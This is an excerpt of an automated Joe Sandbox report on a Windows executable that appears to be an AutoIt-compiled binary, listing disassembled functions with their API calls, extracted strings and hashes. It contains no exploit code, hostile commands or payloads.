                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005178BC
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005178D8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00517902
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0051792A
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00517935
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0051793A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 1411258926-22481851
                                                                                                                      • Opcode ID: 232964e207708e53d314160072d02b621f84e4120b3339804b3ece0b53476186
                                                                                                                      • Instruction ID: fd212bdca37c8c7732c9ebff1358ea274beb2d7f0c010bb258621548fb539d41
                                                                                                                      • Opcode Fuzzy Hash: 232964e207708e53d314160072d02b621f84e4120b3339804b3ece0b53476186
                                                                                                                      • Instruction Fuzzy Hash: 8E41077681422DABDB15EBA9EC85EEDBB78FF18714F00406EE805A2161EA345D48CF94
                                                                                                                      Function 00540E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0053FDAD,?,?), ref: 00540E31
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                      • Opcode ID: 9a8843d6232de6ab66a252883193ad14780c6c8acfefe6b2157cec89d0dbdb90
                                                                                                                      • Instruction ID: 7f4fb89e9fb1866d630a7f75545752f4065a40ef9844a7944071439cbcacb231
                                                                                                                      • Opcode Fuzzy Hash: 9a8843d6232de6ab66a252883193ad14780c6c8acfefe6b2157cec89d0dbdb90
                                                                                                                      • Instruction Fuzzy Hash: 9F41943210024A9BCF10EF11E855AEF3B65BF21308F245479FD651B292D7749D9BDB60
                                                                                                                      Function 0051F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004FE2A0,00000010,?,Bad directive syntax error,0054F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0051F7C2
                                                                                                                      • LoadStringW.USER32(00000000,?,004FE2A0,00000010), ref: 0051F7C9
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                      • _wprintf.LIBCMT ref: 0051F7FC
                                                                                                                      • __swprintf.LIBCMT ref: 0051F81E
                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0051F88D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                      • API String ID: 1506413516-4153970271
                                                                                                                      • Opcode ID: 2e395de2e3fdff8a8ed58ab93712d921220a91327f3c1799c005ff7f80d589e0
                                                                                                                      • Instruction ID: 30fd2ac6cf6f969c682a659a8890b1fd719a951a5e56880e0371c6e876bffec7
                                                                                                                      • Opcode Fuzzy Hash: 2e395de2e3fdff8a8ed58ab93712d921220a91327f3c1799c005ff7f80d589e0
                                                                                                                      • Instruction Fuzzy Hash: 1D21613194021AFBCF11EF91CC0AFFE7B39BF18319F04446AB505660A2DA759658DB54
                                                                                                                      Function 005252C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                        • Part of subcall function 004C7924: _memmove.LIBCMT ref: 004C79AD
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00525330
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00525346
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00525357
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00525369
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0052537A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_memmove
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                      • Opcode ID: 128b2cdd017630e75dd251f401c804e5db0bb4e7d75894a73186a11ba73ab01c
                                                                                                                      • Instruction ID: 5540c0b7dec4996370f95142d039f5081478507a2d9476e1a1adce03700e6213
                                                                                                                      • Opcode Fuzzy Hash: 128b2cdd017630e75dd251f401c804e5db0bb4e7d75894a73186a11ba73ab01c
                                                                                                                      • Instruction Fuzzy Hash: C2118165A901697AD764BB76EC4AEFF7E7CFFA2B54F00082EB415920D1EDB01D04C960
                                                                                                                      Function 005246B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                      • Opcode ID: 8467ae46359f0f9c64d3fc13b11f2889713ab3527b56ef765de15ab186090ee4
                                                                                                                      • Instruction ID: 3d74ffe42e5e2b452f2c3b20683da0263928cc85a01b13ea649a5a591113bcfa
                                                                                                                      • Opcode Fuzzy Hash: 8467ae46359f0f9c64d3fc13b11f2889713ab3527b56ef765de15ab186090ee4
                                                                                                                      • Instruction Fuzzy Hash: B6115731500124AFDB10AB35AC4AEEA7BBCFF13316F0401BAF41596091FFB48E829B50
                                                                                                                      Function 00524F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 00524F7A
                                                                                                                        • Part of subcall function 004E049F: timeGetTime.WINMM(?,7694B400,004D0E7B), ref: 004E04A3
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00524FA6
                                                                                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00524FCA
                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00524FEC
                                                                                                                      • SetActiveWindow.USER32 ref: 0052500B
                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00525019
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00525038
                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00525043
                                                                                                                      • IsWindow.USER32 ref: 0052504F
                                                                                                                      • EndDialog.USER32(00000000), ref: 00525060
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                      • String ID: BUTTON
                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                      • Opcode ID: 77cc15c4048bbd15648e41ca257baa35c2bbb1428a3286808c46b023ab3a27a7
                                                                                                                      • Instruction ID: c775145f5f4b4873a469eda6ef65081706ef4f66eab8f1562c8c89dac6ff6e8a
                                                                                                                      • Opcode Fuzzy Hash: 77cc15c4048bbd15648e41ca257baa35c2bbb1428a3286808c46b023ab3a27a7
                                                                                                                      • Instruction Fuzzy Hash: 99219278200605EFE7106F64FD8CA663FA9FF67749B442024F906912F1EB718D48BB62
                                                                                                                      Function 0052D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0052D5EA
                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0052D67D
                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0052D691
                                                                                                                      • CoCreateInstance.OLE32(00552D7C,00000000,00000001,00578C1C,?), ref: 0052D6DD
                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0052D74C
                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 0052D7A4
                                                                                                                      • _memset.LIBCMT ref: 0052D7E1
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0052D81D
                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0052D840
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0052D847
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0052D87E
                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0052D880
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1246142700-0
                                                                                                                      • Opcode ID: 921468c5d5d19cdc7e91a167f34a7d41ae44418c1bb7d64353d10951db3e7fa9
                                                                                                                      • Instruction ID: 95bdab0908b917fe74fecdf327cbccb539eb4cceae6265dc170799b21601f754
                                                                                                                      • Opcode Fuzzy Hash: 921468c5d5d19cdc7e91a167f34a7d41ae44418c1bb7d64353d10951db3e7fa9
                                                                                                                      • Instruction Fuzzy Hash: 38B11D75A00119AFDB04DFA5D888EAEBBB9FF49314F048469F809EB251DB30ED45CB60
                                                                                                                      Function 0051C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 0051C283
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0051C295
                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0051C2F3
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0051C2FE
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0051C310
                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0051C364
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0051C372
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0051C383
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0051C3C6
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0051C3D4
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0051C3F1
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0051C3FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: a5a64260bd6d1845ee1e1801e562f3ebf872b9a790f1b95e9e8a848c4bcab41e
                                                                                                                      • Instruction ID: a5096949ae74e3dc7ff8818922992705cf61b9427a680fb0b77951bcc95f54d8
                                                                                                                      • Opcode Fuzzy Hash: a5a64260bd6d1845ee1e1801e562f3ebf872b9a790f1b95e9e8a848c4bcab41e
                                                                                                                      • Instruction Fuzzy Hash: 5E516D75B00205AFDB08CFADDD89AAEBBBAFB98314F14852DF515D6290D7709D448B10
                                                                                                                      Function 004C201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004C2036,?,00000000,?,?,?,?,004C16CB,00000000,?), ref: 004C1B9A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004C20D3
                                                                                                                      • KillTimer.USER32(-00000001,?,?,?,?,004C16CB,00000000,?,?,004C1AE2,?,?), ref: 004C216E
                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 004FBCA6
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004C16CB,00000000,?,?,004C1AE2,?,?), ref: 004FBCD7
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004C16CB,00000000,?,?,004C1AE2,?,?), ref: 004FBCEE
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004C16CB,00000000,?,?,004C1AE2,?,?), ref: 004FBD0A
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004FBD1C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 641708696-0
                                                                                                                      • Opcode ID: 334165d75b20cad32cac58c272d18243e735fe1d4b101b9b541b2a07e6520c59
                                                                                                                      • Instruction ID: 56a3eea4df03e9f53f8a53bbc401716af72d0c0d3a6492f6b4ee160f738c4d6b
                                                                                                                      • Opcode Fuzzy Hash: 334165d75b20cad32cac58c272d18243e735fe1d4b101b9b541b2a07e6520c59
                                                                                                                      • Instruction Fuzzy Hash: 9461AF38100A04DFC765AF19CA48B2A77F1FB51316F24842FE64296670C7F8A895EF89
                                                                                                                      Function 004C21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C25DB: GetWindowLongW.USER32(?,000000EB), ref: 004C25EC
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 004C21D3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 259745315-0
                                                                                                                      • Opcode ID: 1964d75c1c806cb7a6340b3618c023a1b5ab640728a01cf1574265ddc6f9ed4b
                                                                                                                      • Instruction ID: d3bf26cba3bca8a2f4f4d91a1703c8db9ab97717a6ef39f9fa1884570904ba93
                                                                                                                      • Opcode Fuzzy Hash: 1964d75c1c806cb7a6340b3618c023a1b5ab640728a01cf1574265ddc6f9ed4b
                                                                                                                      • Instruction Fuzzy Hash: BE41B339000140DFDB259F28DD48FBA3B65EB16331F1442AAFE618A2E1C7B58C42EB65
                                                                                                                      Function 0052A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,0054F910), ref: 0052A90B
                                                                                                                      • GetDriveTypeW.KERNEL32(00000061,005789A0,00000061), ref: 0052A9D5
                                                                                                                      • _wcscpy.LIBCMT ref: 0052A9FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                      • Opcode ID: 4366341f5fbea5f40e3735d985e50461380ee2d022bb50a3045bc041b91a325f
                                                                                                                      • Instruction ID: 462a420cc10ba14399334948be2e873b623657ea11e641bb1ae91a0c18f493ab
                                                                                                                      • Opcode Fuzzy Hash: 4366341f5fbea5f40e3735d985e50461380ee2d022bb50a3045bc041b91a325f
                                                                                                                      • Instruction Fuzzy Hash: 1D51DE35108311ABC700EF16E896AAFBBE5FF95308F00482EF595572E2DB709D89CA53
                                                                                                                      Function 004C9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __i64tow__itow__swprintf
                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 421087845-2263619337
                                                                                                                      • Opcode ID: ffe3da17fa4f7d88bb8ecc347816811a88f131f7aed8b9e6fd77ade4c8487dc3
                                                                                                                      • Instruction ID: 1933bdb02b8dc36c87b46c9fb5423824b1445215133cb3fe607e15ffa2e8d121
                                                                                                                      • Opcode Fuzzy Hash: ffe3da17fa4f7d88bb8ecc347816811a88f131f7aed8b9e6fd77ade4c8487dc3
                                                                                                                      • Instruction Fuzzy Hash: 55412531510209BBEB24EF35D846E7A73E8BF05304F20486FE549C7282EA799D428B29
                                                                                                                      Function 00547152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0054716A
                                                                                                                      • CreateMenu.USER32 ref: 00547185
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00547194
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00547221
                                                                                                                      • IsMenu.USER32(?), ref: 00547237
                                                                                                                      • CreatePopupMenu.USER32 ref: 00547241
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0054726E
                                                                                                                      • DrawMenuBar.USER32 ref: 00547276
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
